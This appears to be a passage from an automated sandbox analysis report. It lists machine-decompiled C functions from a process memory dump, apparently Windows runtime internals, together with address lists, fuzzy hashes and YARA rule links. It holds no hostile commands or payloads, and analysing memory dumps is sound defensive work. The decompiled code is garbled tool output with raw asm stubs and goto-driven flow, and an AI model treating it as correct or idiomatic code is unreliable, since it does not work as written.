				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x04ba90af
0x04ba90b8
0x04ba90bb
0x04ba90bf
0x04ba90c2
0x04ba90c2
0x04ba90c8
0x04ba90cb
0x04ba90cd
0x04be14d7
0x04be14eb
0x04be14eb
0x00000000
0x04be14eb
0x04be14db
0x04be14e6
0x00000000
0x04be14f2
0x04be14e8
0x00000000
0x04be14e8
0x04ba90d8
0x04ba90da
0x04ba90dd
0x04ba90e5
0x00000000
0x04ba9139
0x04ba90fa
0x04ba90fe
0x04ba9142
0x00000000
0x04ba9142
0x04ba9104
0x04ba9107
0x04ba910b
0x04ba9110
0x04ba9118
0x04ba9147
0x04ba9148
0x04ba914f
0x04ba9150
0x04ba9151
0x04ba9152
0x04ba9156
0x04ba915d
0x04ba9160
0x04ba9168
0x04ba916c
0x04ba91bc
0x04ba91be
0x00000000
0x04ba91be
0x04ba916e
0x04ba9173
0x04ba9176
0x00000000
0x00000000
0x04ba917c
0x04ba9180
0x04ba91b5
0x00000000
0x04ba91b5
0x04ba9182
0x04ba9185
0x04ba9189
0x00000000
0x00000000
0x04ba918e
0x04ba9190
0x04ba9198
0x00000000
0x00000000
0x04ba91a0
0x00000000
0x04ba91ad
0x04ba91ad
0x04ba91b0
0x04ba91b1
0x00000000
0x04ba9185
0x04ba911a
0x04ba911c
0x04ba911f
0x04ba9125
0x04ba9127
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 942bafb97afd0387ece0fd2567ddbe70a0df52e8a0ebecf8b0a4b1965696342c
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 452150B5A04205EFDB20DF59C844AAAF7F8EB44354F1488AAE959A7250E370FD60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B93B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04B93B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4c584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4c584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4c584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04BAAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04BAFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4c584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4c584c4; // 0x0
					L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x04b93b89
0x04b93b96
0x04b93ba1
0x04b93bab
0x04b93bb5
0x04b93bb9
0x04bd6298
0x04b93bbf
0x04b93bc2
0x04b93bc3
0x04b93bc9
0x04b93bca
0x04b93bcc
0x04b93bcd
0x04b93bd4
0x04b93bd6
0x04b93bdb
0x04b93bea
0x04b93bf7
0x04b93bfb
0x04b93bff
0x04b93c09
0x04b93c0a
0x04b93c0b
0x04b93c0f
0x04b93c14
0x04b93c18
0x04b93c18
0x04b93bfb
0x04b93c1b
0x04b93c30
0x04b93c30
0x04b93c3d

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911ac0261e6a5cd3c1e00ac6d06a753e4ab42bb6a51ce61bcd19b7fb477327f4
Instruction ID: 0b26f87f83b3294b202dac1c5a926597f3d1591eeb31c7ef0ecb6c5afc755878
Opcode Fuzzy Hash: 911ac0261e6a5cd3c1e00ac6d06a753e4ab42bb6a51ce61bcd19b7fb477327f4
Instruction Fuzzy Hash: A5218072600608AFDB00EF98CD81B6EB7FDFB44708F2500A8E904AB251D775BD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04BE6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04BE6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04B87D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04B87D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4b45c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04B9F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04B9F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04BE7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04B82400( &_v52);
								}
								_t21 = L04B82400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x04be6cfb
0x04be6d00
0x04be6d02
0x04be6d06
0x04be6d0a
0x04be6d0e
0x04be6d19
0x04be6d2b
0x04be6d1b
0x04be6d24
0x04be6d24
0x04be6d33
0x04be6d39
0x04be6d46
0x04be6d4f
0x04be6d61
0x04be6d51
0x04be6d5a
0x04be6d5a
0x04be6d69
0x04be6d6b
0x04be6d6d
0x04be6d6f
0x04be6d6f
0x04be6d74
0x04be6d79
0x04be6d7a
0x04be6d7f
0x04be6d82
0x04be6d88
0x04be6d89
0x04be6d90
0x04be6d94
0x04be6da7
0x04be6db1
0x04be6db1
0x04be6dbb
0x04be6dbb
0x04be6d90
0x04be6d69
0x04be6d46
0x04be6dc6

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20132f62b72ad9df3c9797f5fa3c9edef6713815a4f8ce55dad4b375998ee6f3
Instruction ID: bab1d709ac75a4531435bd8dfb3aca78a3a5e7e922ea824d9e57e33e398a6cdd
Opcode Fuzzy Hash: 20132f62b72ad9df3c9797f5fa3c9edef6713815a4f8ce55dad4b375998ee6f3
Instruction Fuzzy Hash: 312100725003489BD711EF2AC944B7BB7ECEFE1344F8844EAB940C7251EB34E908D6A2

Uniqueness

Uniqueness Score: -1.00%

Function 04C3070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04C3070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04C307DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04C2AFDE( &_v8,  &_v12);
					E04C31293(_t38, _v28, _t60);
					if(E04B87D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04C214FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x04c3071b
0x04c30724
0x04c30734
0x04c30738
0x04c3074b
0x04c3074b
0x04c30753
0x04c30753
0x04c30759
0x04c3075d
0x04c30774
0x04c30779
0x04c3077d
0x04c30789
0x04c30795
0x04c307a7
0x04c30797
0x04c307a0
0x04c307a0
0x04c307af
0x04c307c4
0x04c307cd
0x04c307cd
0x04c307af
0x04c307dc

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 85afc818f11ea3c4b7d7170558130c3a698e8dffb012b532c82ef840cf981084
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: C22104362042009FD715DF19C880B6ABBE6EFC5354F088569F9958B385DB30E909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04B8AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04B8AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04B87D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04B87D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04B87D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04B87D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04BE7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x04b8ae78
0x04b8ae7c
0x04b8ae7e
0x04b8ae81
0x04b8ae86
0x04b8ae8d
0x04bd2691
0x04b8ae93
0x04b8ae93
0x04b8ae93
0x04b8ae98
0x04b8ae9d
0x04bd26a2
0x04bd26b4
0x04bd26a4
0x04bd26ad
0x04bd26ad
0x04bd26b9
0x00000000
0x04bd26bb
0x00000000
0x04bd26bb
0x04b8aea3
0x04b8aea3
0x04b8aea3
0x04b8aeaa
0x04bd26c0
0x04bd26c9
0x04bd26c9
0x04b8aeb3
0x04bd26d4
0x04bd26e1
0x00000000
0x00000000
0x04bd26e7
0x04bd26ee
0x04bd26f0
0x04bd26f9
0x04bd26f9
0x04bd2702
0x04bd2708
0x04bd2708
0x04bd270b
0x04bd270f
0x04bd2711
0x04bd2711
0x04bd2725
0x04bd2725
0x00000000
0x04b8aeb9
0x04b8aeb9
0x04b8aebf
0x04b8aebf
0x04b8aeb3

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 3fa083764538a9206264651e6ea0968b500bb4289cb9b2b99f3b40405f151e6e
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 7521BE71601680DBEB2AAB69C944B2577E8EF44344F2904E6DD048B6A2FB38FC41D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04BE7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04BE7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4c57b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04BAF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E04B87D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04BA9AE0();
					_t24 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x04be7799
0x04be779a
0x04be779b
0x04be77a3
0x04be77ab
0x04be77ae
0x04be77b1
0x04be77b1
0x04be77bf
0x04be77c4
0x04be77c8
0x04be77ce
0x04be77d4
0x04be77e0
0x04be77e0
0x04be77d6
0x04be77d6
0x04be77de
0x00000000
0x00000000
0x04be77de
0x04be77e5
0x04be77f0
0x04be77f3
0x04be77f6
0x04be77fd
0x04be7800
0x04be780c
0x04be7818
0x04be782b
0x04be781a
0x04be7823
0x04be7823
0x04be7830
0x04be7831
0x04be7838
0x04be783d
0x04be783e
0x04be784f
0x04be784f
0x04be785a

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5306d4fd325a729d0e423b678b87245a58f5479620e009330451d38a72b1b579
Instruction ID: 829c75747e3df27198afcf8b5ac5a6adacad8533519a627b198ff20c9ade2a00
Opcode Fuzzy Hash: 5306d4fd325a729d0e423b678b87245a58f5479620e009330451d38a72b1b579
Instruction Fuzzy Hash: BC218E72900644ABC725DF6ADC90EABB7A9EF88740F1045ADF50AD7750EB34E901CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04B9FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E04B9FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E04B776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04B84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x04b9fd9b
0x04b9fda0
0x04b9fda1
0x04b9fdab
0x04b9fdad
0x04b9fdb0
0x04b9fdb8
0x04b9fe0f
0x04b9fde6
0x04b9fde9
0x04b9fdec
0x04bdc0c0
0x04b9fdfe
0x04b9fe06
0x04b9fe06
0x04bdc0c8
0x04b9fe2d
0x04b9fe2d
0x00000000
0x04b9fe2d
0x04bdc0d1
0x04bdc0e0
0x04bdc0e5
0x04bdc0e5
0x04bdc0e8
0x00000000
0x04bdc0e8
0x04b9fdf4
0x00000000
0x00000000
0x04b9fdf6
0x04b9fdfa
0x04b9fe1a
0x04b9fe1f
0x04b9fe1f
0x04b9fdfc
0x00000000
0x04b9fdfc
0x04b9fdcc
0x04b9fdd0
0x04b9fe26
0x00000000
0x04b9fe26
0x04b9fdd8
0x04b9fddb
0x04b9fddd
0x04b9fde0
0x00000000

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: c6446dcee3b167c26770e648d42baa50dce7bea9717f441693ff03beb09b47a8
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 13214972A40A41DFDB35CF49C540A76B7E5EB98B20F2985BEE949C7611E730BC00EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04B69240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E04B69240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4c3f708);
				E04BBD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04BA95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04BA95D0();
				_t33 =  *0x4c584c4; // 0x0
				L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4c584c4; // 0x0
				L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4c584c4; // 0x0
				E04B82280(L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4c586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04BA95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04BA95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E04B69325();
					_t50 =  *0x4c584c4; // 0x0
					return E04BBD0D1(L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x04b69240
0x04b69242
0x04b69247
0x04b6924c
0x04b6924e
0x04b69255
0x04b69257
0x04b6925a
0x04b6925f
0x04b6925f
0x04b69266
0x04b69271
0x04b69276
0x04b69279
0x04b6927e
0x04b69295
0x04b6929a
0x04b692b1
0x04b692b6
0x04b692d7
0x04b692dc
0x04b692e0
0x04b692e6
0x04b692e8
0x04b692ee
0x04b69332
0x04b69333
0x04b69337
0x04b69338
0x04b6933a
0x04b6933a
0x04b6933d
0x04b69342
0x04b69342
0x04b69345
0x04b69349
0x04b6934e
0x04b69352
0x04b69357
0x04b692f4
0x04b692f4
0x04b692f6
0x04b692f9
0x04b69300
0x04b69306
0x04b69324
0x04b69324

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 791d051d14d059e47ecd52c5d4d2f3a5938cba7b49ec840124819c0cc3cb041d
Instruction ID: 1c5a7e0fedac3009f274fd420fcb24231579c93a40d76425e7b73a14d923480f
Opcode Fuzzy Hash: 791d051d14d059e47ecd52c5d4d2f3a5938cba7b49ec840124819c0cc3cb041d
Instruction Fuzzy Hash: 8C211472141A40DFD721FF28CA50B5AB7B9FF18708F1449A8A04A976A1CB38F991DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04B9B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E04B9B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04B82280(_t12, 0x4c58608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04BA00C2(0x4c58608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L04B877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x04b9b395
0x04b9b3a2
0x04b9b3a5
0x04b9b3aa
0x04b9b3b2
0x04b9b3ba
0x04b9b3bd
0x04b9b3c0
0x04b9b3c4
0x04b9b3c9
0x04bda3e9
0x04bda3ed
0x04bda3f0
0x04bda3ff
0x04bda403
0x04bda409
0x00000000
0x00000000
0x04bda40b
0x04bda40b
0x04bda40f
0x04bda415
0x04bda423
0x04bda423
0x04bda415
0x04b9b3d1
0x04b9b3e8
0x04b9b3e8
0x04b9b3d9

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bd13354dd8952a70c3ba8edb4d4158a0add6ccbb881670a5f2c06a77b2fd2a
Instruction ID: 87519229fc345b9f7ad8d3a5241f0a334a31977e84a2d4eeeba707286303da00
Opcode Fuzzy Hash: e3bd13354dd8952a70c3ba8edb4d4158a0add6ccbb881670a5f2c06a77b2fd2a
Instruction Fuzzy Hash: CE1144733091109BDB28EE249D81A2B7397EBC9334B2801BDDD1697390EE31BC02C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 04BF4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04BF4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4c408d0);
				E04BBD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04BF41E8(__ebx, __edi, __ecx, _t39);
				E04B7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4c587e4;
					_t18 =  *0x4c587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4c55cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4c587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4c587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L04B67055(_t31 + 0xfffffff8);
								_t24 =  *0x4c587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4c587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4c55cd0;
				if( *0x4c55cd0 <= 0) {
					L04B67055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4c587e8; // 0x0
					__eflags =  *_t34 - _t35;
